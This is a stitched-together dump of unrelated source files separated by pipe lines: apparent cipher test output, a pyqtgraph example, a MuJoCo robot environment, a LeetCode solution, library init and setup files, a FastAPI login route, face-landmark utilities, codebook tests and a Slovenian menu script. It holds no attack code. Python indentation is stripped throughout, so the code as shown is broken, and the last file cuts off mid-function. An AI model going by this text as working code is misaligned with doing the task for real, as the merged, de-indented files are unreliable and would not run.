--------------------------------------------------------------------
Jj becomes Ii because we use ENGLISH_SQUARE_IJ!
Kv igdatgt Vq dfphwtr dg vem GOTSLTU_ZSVNYG_KV!
Ii becomes Ii because we use ENGLISH_SQUARE_II!
--------------------------------------------------------------------
text いろはにほへと ちりぬるを わかよたれそ つねならむ うゐのおくやま けふこえて あさきゆめみし ゑひもせす !
text うえぶねばまに てるぼゅゃ をすをつろぢ どはにぇり おゐはしごよみ ざぼぎおは くすくょるめす ゑぺれざせ !
text いろはにほへと ちりぬるを わかよたれそ つねならむ うゐのおくやま けふこえて あさきゆめみし ゑひもせす !
--------------------------------------------------------------------
Θέλει αρετή και τόλμη η ελευθερία. (Ανδρέας Κάλβος)
ΙΟΡΖΊ ΊΧΖΥΡ ΠΒΊ ΔΎΝΝΠ Μ ΖΜΞΑΊΈΆΌΒ. (ΆΧΙΣΖΊΩ ΜΒΎΉΠΤ)
ΘΈΛΕΙ ΑΡΕΤΉ ΚΑΙ ΤΌΛΜΗ Η ΕΛΕΥΘΕΡΊΑ. (ΑΝΔΠΈΑΣ ΚΆΛΒΟΣ)
'''
|
# -*- coding: utf-8 -*-
"""
Test programmatically setting log transformation modes.
"""
import initExample ## Add path to library (just for examples; you do not need this)
import numpy as np
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
app = QtGui.QApplication([])
w = pg.GraphicsLayoutWidget(show=True)
w.setWindowTitle('pyqtgraph example: logAxis')
p1 = w.addPlot(0,0, title="X Semilog")
p2 = w.addPlot(1,0, title="Y Semilog")
p3 = w.addPlot(2,0, title="XY Log")
p1.showGrid(True, True)
p2.showGrid(True, True)
p3.showGrid(True, True)
p1.setLogMode(True, False)
p2.setLogMode(False, True)
p3.setLogMode(True, True)
w.show()
y = np.random.normal(size=1000)
x = np.linspace(0, 1, 1000)
p1.plot(x, y)
p2.plot(x, y)
p3.plot(x, y)
#p.getAxis('bottom').setLogMode(True)
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
|
# Copyright (c) 2021-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import logging
from typing import List
import gym
import numpy as np
from dm_control import mjcf
from bisk.base import BiskEnv
from bisk.features import make_featurizer
from bisk.helpers import add_ball, add_robot, root_with_floor
log = logging.getLogger(__name__)
class BiskSingleRobotEnv(BiskEnv):
def __init__(
self, robot: str, features: str = 'joints', allow_fallover: bool = False
):
super().__init__()
self.allow_fallover = allow_fallover
root = root_with_floor()
_, robot_pos = add_robot(root, robot, 'robot')
self.robot = robot.lower()
frameskip = 5
fs = root.find('numeric', 'robot/frameskip')
if fs is not None:
frameskip = int(fs.data[0])
self.init_sim(root, frameskip)
if self.robot.startswith('halfcheetah'):
# qpos is x_pos, z_pos, y_rot
self.init_qpos[0] = robot_pos[0]
self.init_qpos[1] = robot_pos[2]
elif self.robot.startswith('walker'):
# qpos is z_pos, x_pos, y_rot
self.init_qpos[0] = robot_pos[2]
self.init_qpos[1] = robot_pos[0]
else:
# TODO Verify that this actually corresponds to the torso position?
self.init_qpos[0:3] = robot_pos
self.featurizer = self.make_featurizer(features)
self.observation_space = self.featurizer.observation_space
self.seed()
@property
def is_2d(self):
# TODO sth more proper? But it needs to be callable from init_sim, i.e.
# before the simulator instance is constructed.
return (
self.robot.startswith('halfcheetah')
or self.robot.startswith('walker')
or self.robot == 'testcube2d'
)
@property
def robot_pos(self) -> np.ndarray:
return self.p.named.data.xpos['robot/torso']
def make_featurizer(self, features: str):
return make_featurizer(features, self.p, self.robot, 'robot')
def reset_state(self):
noise = 0.1
qpos = self.init_qpos + self.np_random.uniform(
low=-noise, high=noise, size=self.p.model.nq
)
qvel = self.init_qvel + noise * self.np_random.randn(self.p.model.nv)
self.p.data.qpos[:] = qpos
self.p.data.qvel[:] = qvel
def get_observation(self):
return self.featurizer()
def fell_over(self) -> bool:
if self.robot.startswith('humanoid'):
zpos = self.robot_pos[2]
return bool(zpos < 0.9)
elif self.robot.startswith('halfcheetah'):
# Orientation pointing upwards and body almost on the ground
up = self.p.named.data.xmat['robot/torso', 'zz']
zpos = self.p.named.data.qpos['robot/rootz']
if up < -0.8 and zpos < 0.12:
return True
elif self.robot.startswith('walker'):
zpos = self.p.named.data.qpos['robot/rootz']
r = self.p.named.data.qpos['robot/rooty']
if zpos < 0.9 or r < -1.4 or r > 1.4:
return True
return False
def step(self, action):
obs, reward, done, info = super().step(action)
if not self.allow_fallover and self.fell_over():
done = True
info['fell_over'] = True
return obs, reward, done, info
class BiskSingleRobotWithBallEnv(BiskSingleRobotEnv):
def __init__(
self, robot: str, features: str = 'joints', allow_fallover: bool = False
):
super().__init__(robot, features, allow_fallover)
self.ball_qpos_idx: List[int] = []
self.ball_qvel_idx: List[int] = []
if self.is_2d:
for j in ['ball-x', 'ball-z', 'ball-ry']:
qppos = self.p.named.model.jnt_qposadr[j]
self.ball_qpos_idx.append(qppos)
qvpos = self.p.named.model.jnt_dofadr[j]
self.ball_qvel_idx.append(qvpos)
else:
qppos = self.p.named.model.jnt_qposadr['ball']
for i in range(3):
self.ball_qpos_idx.append(qppos + i)
qvpos = self.p.named.model.jnt_dofadr['ball']
for i in range(6):
self.ball_qvel_idx.append(qvpos + i)
obs_base = self.featurizer.observation_space
obs_env = gym.spaces.Box(
low=-np.inf,
high=np.inf,
shape=(len(self.ball_qpos_idx) + len(self.ball_qvel_idx),),
dtype=np.float32,
)
self.observation_space = gym.spaces.Dict(
[
('ball', obs_env),
('observation', obs_base),
]
)
self.seed()
def init_sim(self, root: mjcf.RootElement, frameskip: int = 5):
ball_size = 0.15
add_ball(root, 'ball', size=ball_size, mass=0.1, twod=self.is_2d)
super().init_sim(root, frameskip)
def reset_state(self):
super().reset_state()
# Small noise for ball
noise = 0.01
qpos = self.init_qpos + self.np_random.uniform(
low=-noise, high=noise, size=self.p.model.nq
)
qvel = self.init_qvel + noise * self.np_random.randn(self.p.model.nv)
self.p.data.qpos[self.ball_qpos_idx] = qpos[self.ball_qpos_idx]
self.p.data.qvel[self.ball_qvel_idx] = qvel[self.ball_qvel_idx]
def get_observation(self):
ball_qpos = self.p.data.qpos[self.ball_qpos_idx].ravel().copy()
ball_qvel = self.p.data.qvel[self.ball_qvel_idx]
# Ball X/Y position is relative to robot's torso
ball_qpos[0] -= self.robot_pos[0]
if not self.is_2d:
ball_qpos[1] -= self.robot_pos[1]
else:
# Normalize Y rotation to [-pi,pi], as MuJoCo produces large values
# occasionally.
ball_qpos[2] = np.arctan2(
np.sin(ball_qpos[2]), np.cos(ball_qpos[2])
)
return {
'observation': super().get_observation(),
'ball': np.concatenate([ball_qpos, ball_qvel]).astype(np.float32),
}
|
class Solution:
def specialArray(self, nums: List[int]) -> int:
nums.sort()
n = len(nums)
if nums[0] >= n: return n
for i in range(1, n + 1):
if nums[n - i - 1] < i <= nums[n - i]: return i
return -1
|
"""
********************************************************************************
compas.utilities
********************************************************************************
.. currentmodule:: compas.utilities
animation
=========
.. autosummary::
:toctree: generated/
:nosignatures:
gif_from_images
colors
======
.. autosummary::
:toctree: generated/
:nosignatures:
i_to_rgb
i_to_red
i_to_green
i_to_blue
i_to_white
i_to_black
rgb_to_hex
color_to_colordict
color_to_rgb
datetime
========
.. autosummary::
:toctree: generated/
:nosignatures:
.. timestamp
decorators
==========
.. autosummary::
:toctree: generated/
:nosignatures:
memoize
itertools
=========
.. autosummary::
:toctree: generated/
:nosignatures:
take
tabulate
tail
consume
nth
all_equal
quantify
padnone
ncycles
dotproduct
flatten
repeatfunc
pairwise
window
roundrobin
powerset
unique_everseen
unique_justseen
iter_except
first_true
random_permutation
random_combination
random_combination_with_replacement
maps
====
.. autosummary::
:toctree: generated/
:nosignatures:
geometric_key
geometric_key2
normalize_values
mixing
======
.. autosummary::
:toctree: generated/
:nosignatures:
mix_in_functions
mix_in_class_attributes
names
=====
.. autosummary::
:toctree: generated/
:nosignatures:
random_name
profiling
=========
.. autosummary::
:toctree: generated/
:nosignatures:
print_profile
xfunc
=====
.. autosummary::
:toctree: generated/
:nosignatures:
XFunc
"""
from __future__ import absolute_import
def valuedict(keys, value, default):
value = value or default
if isinstance(value, dict):
valuedict = {key: default for key in keys}
valuedict.update(value)
else:
valuedict = {key: value for key in keys}
return valuedict
from .animation import *
from .coercing import *
from .colors import *
from .datetime_ import *
from .decorators import *
from .encoders import *
from .itertools_ import *
from .maps import *
from .mixing import *
from .names import *
from .profiling import *
from .remote import *
from .sorting import *
from .xfunc import *
from .xscript import *
from .functions import *
from . import animation
from . import coercing
from . import colors
from . import datetime_
from . import decorators
from . import encoders
from . import itertools_
from . import maps
from . import mixing
from . import names
from . import profiling
from . import remote
from . import sorting
from . import xfunc
from . import xscript
from . import functions
__all__ = []
__all__ += animation.__all__ + coercing.__all__ + colors.__all__
__all__ += datetime_.__all__ + decorators.__all__ + encoders.__all__
__all__ += itertools_.__all__ + maps.__all__ + mixing.__all__ + names.__all__
__all__ += profiling.__all__ + remote.__all__ + sorting.__all__
__all__ += xfunc.__all__ + xscript.__all__
__all__ += functions.__all__
|
import math
import networkx as nx
from src.util.gen_files import *
from src.util.virtual_run import *
def caculate_tail(S, C, totalContents):
N = len(S)
result = 0
if N * C > totalContents:
result = totalContents
else:
result = N * C
for i in range(0, N-1):
result -= S[i]
return result
def get_hop_count(graph, user_i, cache_j):
return nx.dijkstra_path(graph,source=user_i,target=cache_j)
def estimate_traffic(S_tmp, graph,
nearestColorServerInfo , totalColor, uniqueSortedContentList, cacheDict,
serverToColorMap, fileSize, routingTable, warmUpReqDict, runReqDict, clientList):
contentToColorDict = colorizeWithSeparatorRanks(uniqueSortedContentList, S_tmp, totalColor)
estimasted_traffic = runWithColorRouting(graph, cacheDict, contentToColorDict, nearestColorServerInfo,
serverToColorMap, fileSize, routingTable, runReqDict, clientList)
return estimasted_traffic
def evaluate_traffic(S_tmp, graph,
nearestColorServerInfo , totalColor, uniqueSortedContentList, cacheDict,
serverToColorMap, fileSize, routingTable, warmUpReqDict, runReqDict, clientList):
contentToColorDict = colorizeWithSeparatorRanks(uniqueSortedContentList, S_tmp, totalColor)
warmUpColor(graph, cacheDict, contentToColorDict, nearestColorServerInfo, serverToColorMap, fileSize, routingTable, warmUpReqDict, clientList)
estimasted_traffic = runWithColorRouting(graph, cacheDict, contentToColorDict, nearestColorServerInfo,
serverToColorMap, fileSize, routingTable, runReqDict, clientList)
return estimasted_traffic
def isSeparatorRanksValid(S):
for i in range(1, len(S)):
if S[i-1] > S[i]:
return False
return True
def cloneCacheDict(cacheDict):
result = {}
for cacheId in cacheDict:
result[cacheId] = cacheDict[cacheId].clone()
return result
def compute_rank(numberOfColor, cacheServerCapacity, fileSize, graph, nearestColorServerInfo, contentGenerator,
cacheDict, serverToColorMap, warmUpReqNums, runReqNums, clientList, increaseSRs=1, interval="Interval0", parallel_idx=0):
N = int(numberOfColor)
C = int(cacheServerCapacity/ fileSize)
if fileSize < 0:
print(fileSize)
raise Exception('File size must be a positive number for color based algorithms')
numberOfCache = len(cacheDict.keys())
numberOfContent = len(contentGenerator.uniqueSortedContentList[interval])
incr = int(increaseSRs * numberOfContent / 100.0)
S = [0] * N
S_prev = [0] * N
T_min = float("inf")
if N*C > numberOfContent:
S[N-1] = int(numberOfContent)
else:
S[N-1] = N * C
routingTable = {}
warmUpReqDict = {}
runReqDict = {}
tempCacheDict = cloneCacheDict(cacheDict)
if contentGenerator.dist != None:
for client in clientList:
warmUpReqDict[client] = contentGenerator.randomGen(warmUpReqNums)
runReqDict[client] = contentGenerator.randomGen(runReqNums)
# Fill cache
initContentToColorDict = colorizeWithSeparatorRanks(contentGenerator.uniqueSortedContentList[interval], S, numberOfColor)
warmUpColor(graph, tempCacheDict, initContentToColorDict, nearestColorServerInfo, serverToColorMap, fileSize, routingTable, warmUpReqDict, clientList)
else:
intervalIdx = int(interval.replace("Interval", ""))
if intervalIdx == 0 or interval == "noInterval":
for cache in contentGenerator.custom_data:
client = cache.replace("Cache_", "client_")
warmUpReqDict[client] = contentGenerator.custom_data[cache][interval]
runReqDict[client] = contentGenerator.custom_data[cache][interval]
# Fill cache
initContentToColorDict = colorizeWithSeparatorRanks(contentGenerator.uniqueSortedContentList[interval], S, numberOfColor)
warmUpColor(graph, tempCacheDict, initContentToColorDict, nearestColorServerInfo, serverToColorMap, fileSize, routingTable, warmUpReqDict, clientList)
else:
for cache in contentGenerator.custom_data:
client = cache.replace("Cache_", "client_")
runReqDict[client] = contentGenerator.custom_data[cache][interval]
with open("data/saveCacheDict_" + str(parallel_idx) + ".pkl", "wb") as f:
pickle.dump(tempCacheDict, f)
result = {}
while S_prev != S:
S_prev = list(S)
for i in range(0, N-1):
for v in range(S[max(1, i)-1], S[i+1]+1, incr):
S_tmp = list(S)
S_tmp[i] = v
S_tmp[N - 1] = caculate_tail(S_tmp, C, numberOfContent)
if not isSeparatorRanksValid(S_tmp):
break
with open("data/saveCacheDict_" + str(parallel_idx) + ".pkl", "rb") as f:
tempCloneDict = pickle.load(f)
T_est = estimate_traffic(S_tmp, graph, nearestColorServerInfo, N,
contentGenerator.uniqueSortedContentList[interval], tempCloneDict,
serverToColorMap, fileSize, routingTable, warmUpReqDict, runReqDict,
clientList)
if T_est < T_min:
T_min = T_est
S = S_tmp
result = {"cacheDict": tempCloneDict, "S": S}
return result
def estimate_traffic_shortest_path_with_color(S_tmp, graph,
nearestColorServerInfo , totalColor, uniqueSortedContentList, cacheDict, fileSize, routingTable, runReqDict, clientList):
contentToColorDict = colorizeWithSeparatorRanks(uniqueSortedContentList, S_tmp, totalColor)
estimasted_traffic = runWithShortestPath(graph, cacheDict, fileSize, "tag-color", routingTable, runReqDict, clientList, contentToColorDict)
return estimasted_traffic
def evaluate_traffic_shortest_path_with_color(S_tmp, graph,
nearestColorServerInfo , totalColor, uniqueSortedContentList, cacheDict, fileSize, routingTable, warmUpReqDict, runReqDict, clientList):
contentToColorDict = colorizeWithSeparatorRanks(uniqueSortedContentList, S_tmp, totalColor)
warmUpCacheShortestPath(graph, cacheDict, fileSize, "tag-color", routingTable, warmUpReqDict, clientList, contentToColorDict)
estimasted_traffic = runWithShortestPath(graph, cacheDict, fileSize, "tag-color", routingTable, runReqDict, clientList, contentToColorDict)
return estimasted_traffic
def compute_rank_shortest_path_with_color(numberOfColor, cacheServerCapacity, fileSize, graph, nearestColorServerInfo, contentGenerator, cacheDict, warmUpReqNums, runReqNums,
clientList, increaseSRs=1, interval="", parallel_idx=0):
N = numberOfColor
C = int(cacheServerCapacity / fileSize)
if fileSize < 0:
print(fileSize)
raise Exception('File size must be a positive number for color based algorithms')
numberOfCache = len(cacheDict.keys())
numberOfContent = len(contentGenerator.uniqueSortedContentList[interval])
S = [0] * N
S_prev = [0] * N
T_min = float("inf")
if N*C > numberOfContent:
S[N-1] = numberOfContent
else:
S[N-1] = N * C
incr = int(increaseSRs * numberOfContent / 100.0)
routingTable = {}
warmUpReqDict = {}
runReqDict = {}
tempCacheDict = cloneCacheDict(cacheDict)
if contentGenerator.dist != None:
for client in clientList:
warmUpReqDict[client] = contentGenerator.randomGen(warmUpReqNums)
runReqDict[client] = contentGenerator.randomGen(runReqNums)
initContentToColorDict = colorizeWithSeparatorRanks(contentGenerator.uniqueSortedContentList[interval], S, numberOfColor)
warmUpCacheShortestPath(graph, tempCacheDict, fileSize, "tag-color", routingTable, warmUpReqDict, clientList, initContentToColorDict)
else:
intervalIdx = int(interval.replace("Interval", ""))
if intervalIdx == 0 or interval == "noInterval":
for cache in contentGenerator.custom_data:
client = cache.replace("Cache_", "client_")
warmUpReqDict[client] = contentGenerator.custom_data[cache][interval]
runReqDict[client] = contentGenerator.custom_data[cache][interval]
initContentToColorDict = colorizeWithSeparatorRanks(contentGenerator.uniqueSortedContentList[interval], S, numberOfColor)
warmUpCacheShortestPath(graph, tempCacheDict, fileSize, "tag-color", routingTable, warmUpReqDict, clientList, initContentToColorDict)
else:
for cache in contentGenerator.custom_data:
client = cache.replace("Cache_", "client_")
runReqDict[client] = contentGenerator.custom_data[cache][interval]
with open("data/saveCacheDict_" + str(parallel_idx) + ".pkl", "wb") as f:
pickle.dump(tempCacheDict, f)
result = {}
while S_prev != S:
S_prev = list(S)
for i in range(0, N-1):
for v in range(S[max(1, i)-1], S[i+1]+1, incr):
S_tmp = list(S)
S_tmp[i] = int(v)
S_tmp[N - 1] = int(caculate_tail(S_tmp, C, numberOfContent))
if not isSeparatorRanksValid(S_tmp):
break
with open("data/saveCacheDict_" + str(parallel_idx) + ".pkl", "rb") as f:
tempCloneDict = pickle.load(f)
T_est = estimate_traffic_shortest_path_with_color(S_tmp, graph, nearestColorServerInfo, N, contentGenerator.uniqueSortedContentList[interval], tempCloneDict, fileSize, routingTable, runReqDict, clientList)
if T_est < T_min:
T_min = T_est
S = S_tmp
result = {"cacheDict": tempCloneDict, "S": S}
return result |
from jip.dist import setup
requires_java = {
'dependencies':[
## (groupdId, artifactId, version)
('org.slf4j', 'slf4j-api', '1.7.21'),
('ch.qos.logback', 'logback-core', '1.2.2'),
('org.lucee', 'commons-lang', '2.6.0'),
('org.apache.commons', 'commons-math3', '3.6.1'),
# ('org.eclipse', 'eclipse-january', '2.0.2'),
],
'repositories':[
('sonatype-oss-snapshot', 'http://oss.sonatype.org/content/repositories/snapshots/')
]
}
setup(
name='january',
version='0.1',
description='Eclipse January Jython bindings',
long_description='Jython bindings to provide a NumPy-like ndarray',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2.7',
'Topic :: Scientific/Engineering',
'Topic :: Software Development',
],
keywords='array processing',
url='https://github.com/eclipse/january-jython',
author='Peter Chang',
author_email='[email protected]',
license='ALv2',
packages=['january'],
# zip_safe=False,
requires_java=requires_java,
requires=['decorator'], # install_requires is not in Jython 2.7
)
|
from typing import List, Optional
from datetime import timedelta
from fastapi import APIRouter, Depends, HTTPException, status
from fastapi.security import OAuth2PasswordRequestForm
from fastapi.responses import JSONResponse
from webapi.db.dals.user_dal import User, UserDAL
from webapi.db.schemas.token import Token
from webapi.utils.dependencies import DALGetter, get_current_user
from webapi.setting import settings
from webapi.utils import security
router = APIRouter()
@router.post("/login/access_token/", tags=['User'],
response_model=Token, status_code=status.HTTP_201_CREATED)
async def login_access_token(
dal: UserDAL = Depends(DALGetter(UserDAL)),
form_data: OAuth2PasswordRequestForm = Depends()
):
user = await dal.authenticate(
username=form_data.username,
password=form_data.password
)
if not user:
raise HTTPException(
status_code=400, detail="Incorrect email or password"
)
access_token_expires = timedelta(minutes=settings.ACCESS_TOKEN_EXPIRE_MINUTES)
return {
'access_token': security.create_access_token(
user.id, expires_delta=access_token_expires
),
"token_type": "bearer"
}
@router.get('/login/getinfo/', tags=['User'])
async def login_getinfo(
current_user: User = Depends(get_current_user)
):
data = {
'username': current_user.username,
'nickname': current_user.nickname,
'roles': ['admin', ]
}
return JSONResponse(content=data, status_code=status.HTTP_200_OK)
|
#!/usr/bin/env python3
"""
face.py
---
Face detection and landmarking utilities.
Relies on `dlib` for face-detection and `PRNet + PyTorch` for landmarking.
"""
import os
import time
import dlib
import numpy as np
import src.utils.utility as _util
from src.models.face.prnet import PRN
_mouth = slice(48, 68)
_right_eyebrow = slice(17, 22)
_left_eyebrow = slice(22, 27)
_right_eye = slice(36, 42)
_left_eye = slice(42, 48)
_nose = slice(27, 35)
_jaw = slice(0, 17)
_face_pts = 68
_mouth_pts = 20
# Shared face detector, landmarker, and reference 3D Model for frontalization.
_face_landmarks_path = "./data/weights/dlib/shape_predictor_68_face_landmarks.dat"
_prn = None
_detector = None
_landmarker = None
def _getSharedLogger():
return _util.getLogger(os.path.basename(__file__).split('.')[0])
def _getSharedPrn(is_dlib=True, gpuIds="0"):
global _prn
if _prn is None:
os.environ['CUDA_VISIBLE_DEVICES'] = gpuIds
_prn = PRN(is_dlib=is_dlib)
return _prn
def _getSharedDetector():
global _detector
if _detector is None:
_detector = dlib.get_frontal_face_detector()
return _detector
def _getSharedLandmarker():
global _landmarker
if _landmarker is None:
_landmarker = dlib.shape_predictor(_face_landmarks_path)
return _landmarker
def detectFaceRects(img, times_to_upsample=2):
rects = _getSharedDetector()(img, times_to_upsample)
return rects
def detectMaxFaceRect(img, times_to_upsample=2):
_getSharedLogger().debug("Detecting maximum face rect for img of shape='%s'...", img.shape)
ts = time.time()
rects = detectFaceRects(img, times_to_upsample=times_to_upsample)
_getSharedLogger().debug("Done! Took '%0.3f' seconds...", time.time() - ts)
assert len(rects) > 0
maxRectIdx = np.argmax(x.height() * x.width() for x in rects)
rect = rects[maxRectIdx]
rect = rect.left(), rect.right(), rect.top(), rect.bottom()
return rect
def _applyPadding(dims, rect, padding):
""" Apply padding to each side of a rectangle based on width and height percentage. """
assert len(dims) == 3
img_h, img_w, _ = dims
left, right, top, bottom = rect
box_h = bottom - top
box_w = right - left
# Apply bounded padding.
left = max(0, left - int(padding * box_w))
right = min(img_w, right + int(padding * box_w))
top = max(0, top - int(padding * box_h))
bottom = min(img_h, bottom + int(padding * box_h))
return left, right, top, bottom
def detectMaxFace(img, rect=None, times_to_upsample=2, padding=0.2):
assert len(img.shape) == 3
if rect is None:
rect = detectMaxFaceRect(img, times_to_upsample=times_to_upsample)
if padding is not None:
left, right, top, bottom = _applyPadding(img.shape, rect, padding)
else:
left, right, top, bottom = rect
return img[top:bottom, left:right, :]
def extractFace(img, rect, padding=None):
assert len(img.shape) == 3
assert isinstance(rect, tuple) and len(rect) == 4
# Apply padding.
if padding is not None:
assert 0 < padding <= 0.5
rect = _applyPadding(img.shape, rect, padding)
left, right, top, bottom = rect
res = img[top:bottom, left:right, :]
assert all(x > 0 for x in res.shape)
return res, rect
def computeMaxLandmarks(img, times_to_upsample=2):
""" Computes max face landmarks. """
maxRect = detectMaxFaceRect(img, times_to_upsample=times_to_upsample)
lmks = _getSharedLandmarker()(img, maxRect)
assert lmks is not None, "Failed to compute landmarks for image of shape: '{}'".format(img.shape)
return lmks
def detect3dLandmarks(img, rect=None, is_dlib=False, gpuIds="0"):
""" Extracts 3D landmarks from the largest detected face in each frame of the provided video.
"""
assert len(img.shape) == 3
_getSharedLogger().info("Computing Position Map for img of shape='%s'...", img.shape)
ts = time.time()
pos_map, inp_img = _getSharedPrn(is_dlib=is_dlib, gpuIds=gpuIds).process(img, image_info=rect)
_getSharedLogger().debug("Done! Took '%0.3f' seconds", time.time() - ts)
if pos_map is None:
return None
lmks3d = _getSharedPrn(is_dlib=is_dlib, gpuIds=gpuIds).get_landmarks(pos_map)
if lmks3d is None:
_getSharedLogger().warning("No face detected!")
return lmks3d, inp_img
def detect3dVertices(img, rect=None, is_dlib=True, gpuIds="0"):
assert len(img.shape) == 3
_getSharedLogger().info("Computing Position Map for img of shape='%s'...", img.shape)
ts = time.time()
pos_map, inp_img = _getSharedPrn(is_dlib=is_dlib, gpuIds=gpuIds).process(img, image_info=rect)
_getSharedLogger().debug("Done! Took '%0.3f' seconds", time.time() - ts)
if pos_map is None:
return None
lmks3d = _getSharedPrn(is_dlib=is_dlib, gpuIds=gpuIds).get_landmarks(pos_map)
if lmks3d is None:
_getSharedLogger().warning("No face detected!")
return lmks3d, inp_img
def get3dLandmarks():
assert _getSharedPrn().pos is not None
pos_map = _getSharedPrn().pos
lmks3d = _getSharedPrn().get_landmarks(pos_map)
return lmks3d
def get3dVertices():
assert _getSharedPrn().pos is not None
pos_map = _getSharedPrn().pos
vertices3d = _getSharedPrn().get_vertices(pos_map)
return vertices3d
def getFace(inp, rect):
""" Converts raw landmarks to face landmarks, relative to a face rectangle.
This is simply a translation of all the xy coordinates: leftwards by the rectangle's left coordinate, and upwards
by the rectangles top coordinate.
"""
assert len(inp.shape) == 2 and inp.shape[1] == 3
assert isinstance(rect, tuple) and len(rect) == 4
left, right, top, bottom = rect
res = inp.copy()
res[:, 0] -= left
res[:, 1] -= top
return res
|
import warnings
import tempfile
import os
import numpy as np
import pytest
from starfish.constants import Indices
from starfish.codebook import Codebook
from starfish.intensity_table import IntensityTable
# don't inspect pytest fixtures in pycharm
# noinspection PyUnresolvedReferences
from starfish.test.dataset_fixtures import (
simple_codebook_json, simple_codebook_array, euclidean_decoded_intensities,
per_channel_max_decoded_intensities, loaded_codebook, small_intensity_table)
def test_loading_codebook_from_json(simple_codebook_json):
cb = Codebook.from_json(simple_codebook_json, n_ch=2, n_hyb=2)
assert isinstance(cb, Codebook)
def test_loading_codebook_from_list(simple_codebook_array):
cb = Codebook.from_code_array(simple_codebook_array, n_ch=2, n_hyb=2)
assert isinstance(cb, Codebook)
def test_loading_codebook_without_specifying_ch_hyb_guesses_correct_values(simple_codebook_array):
cb = Codebook.from_code_array(simple_codebook_array)
assert cb.shape == (3, 2, 2)
def test_loading_codebook_with_too_few_dims_raises_value_error(simple_codebook_json):
with pytest.raises(ValueError):
Codebook.from_json(simple_codebook_json, n_ch=1, n_hyb=2)
with pytest.raises(ValueError):
Codebook.from_json(simple_codebook_json, n_ch=2, n_hyb=1)
def test_euclidean_decode_yields_correct_output(euclidean_decoded_intensities):
expected_gene_annotation = np.array(["ACTB", "SCUBE2", "BRCA"])
observed_gene_annotation = euclidean_decoded_intensities[
IntensityTable.Constants.GENE.value].values
assert np.array_equal(expected_gene_annotation, observed_gene_annotation)
def test_indexing_on_set_genes(euclidean_decoded_intensities):
# note that this kind of indexing produces an xarray-internal FutureWarning about float
# conversion that we can safely ignore here.
is_actin = euclidean_decoded_intensities[IntensityTable.Constants.GENE.value] == 'ACTB'
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
# select only the intensities that are actin, drop the rest
result = euclidean_decoded_intensities.where(is_actin, drop=True)
assert result.shape == (1, 2, 2)
def test_synthetic_codes_are_on_only_once_per_channel(euclidean_decoded_intensities):
expected_gene_annotation = np.array(["ACTB", "SCUBE2", "BRCA"])
observed_gene_annotation = euclidean_decoded_intensities[
IntensityTable.Constants.GENE.value].values
assert np.array_equal(expected_gene_annotation, observed_gene_annotation)
def test_per_channel_max_decode_yields_expected_results(per_channel_max_decoded_intensities):
expected_gene_annotation = np.array(["ACTB", "SCUBE2", "BRCA"])
observed_gene_annotation = per_channel_max_decoded_intensities[
IntensityTable.Constants.GENE.value].values
assert np.array_equal(expected_gene_annotation, observed_gene_annotation)
def test_synthetic_one_hot_codes_produce_one_channel_per_hyb():
cb = Codebook.synthetic_one_hot_codebook(n_hyb=6, n_channel=4, n_codes=100)
# sum over channels: only one should be "on"
assert np.all(cb.sum(Indices.CH.value) == 1)
def test_codebook_save(loaded_codebook):
directory = tempfile.mkdtemp()
filename = os.path.join(directory, 'codebook.json')
loaded_codebook.to_json(filename)
reloaded = Codebook.from_json(filename, n_hyb=2, n_ch=2)
assert np.array_equal(loaded_codebook, reloaded)
assert np.array_equal(loaded_codebook[Indices.CH.value], reloaded[Indices.CH.value])
assert np.array_equal(loaded_codebook[Indices.HYB.value], reloaded[Indices.HYB.value])
assert np.array_equal(loaded_codebook[Codebook.Constants.GENE.value].values,
reloaded[Codebook.Constants.GENE.value].values)
@pytest.mark.parametrize('n_ch, n_hyb', ((2, 2), (5, 4)))
def test_loading_codebook_with_unused_channels_and_hybs(simple_codebook_json, n_ch, n_hyb):
cb = Codebook.from_json(simple_codebook_json, n_ch=n_ch, n_hyb=n_hyb)
assert cb.shape == (3, n_ch, n_hyb)
@pytest.mark.parametrize('n_ch, n_hyb', ((2, 2), (5, 4)))
def test_code_length(n_ch, n_hyb):
gene_names = np.arange(10)
cb = Codebook._empty_codebook(gene_names, n_ch, n_hyb)
assert cb.code_length == n_ch * n_hyb
|
import modeli
def izberi_moznost(moznosti):
"""
Funkcija, ki izpiše seznam možnosti in vrne indeks izbrane možnosti.
Če na voljo ni nobene možnosti, izpiše opozorilo in vrne None.
Če je na voljo samo ena možnost, vrne 0.
>>> izberi_moznost(['jabolko', 'hruška', 'stol'])
1) jabolko
2) hruška
3) stol
Vnesite izbiro > 2
1
>>> izberi_moznost([])
>>> izberi_moznost(['jabolko'])
0
"""
if len(moznosti) == 0:
return
elif len(moznosti) == 1:
return 0
else:
for i, moznost in enumerate(moznosti, 1):
print('{}) {}'.format(i, moznost))
st_moznosti = len(moznosti)
while True:
izbira = input('Vnesite izbiro > ')
if not izbira.isdigit():
print('NAPAKA: vnesti morate število')
else:
n = int(izbira)
if 1 <= n <= st_moznosti:
return n - 1
else:
print('NAPAKA: vnesti morate število med 1 in {}!'.format(
st_moznosti))
# 1) Kupec
def prikazi_podatke_kupcev():
id_kupca = izberi_kupca()
if id_kupca is None:
print('Noben kupec ne ustreza iskalnemu nizu.')
else:
ime, naslov, davcna_stevilka, kontaktna_oseba = modeli.podatki_kupca(id_kupca)
print(' {}'.format(ime))
print(' naslov: {}'.format(naslov))
print(' davcna stevilka: {}'.format(davcna_stevilka))
print(' kontaktna oseba: {}'.format(kontaktna_oseba))
def izberi_kupca():
niz = input('Vnesite del imena kupca > ')
idji_kupcev = modeli.poisci_kupca(niz)
moznosti = [
'{} ***{}***'.format(ime, naslov) for _, ime, naslov in modeli.podatki_kupcev(idji_kupcev)
]
izbira = izberi_moznost(moznosti)
return None if izbira is None else idji_kupcev[izbira]
# 2) Izdelki
def prikazi_podatke_izdelkov():
id_izdelka = izberi_izdelek()
if id_izdelka is None:
print('Noben izdelek ne ustreza iskalnemu nizu.')
else:
opis, zaloga, cena, kategorija = modeli.podatki_izdelka(id_izdelka)
print(' {}'.format(opis))
print(' zaloga: {}'.format(zaloga))
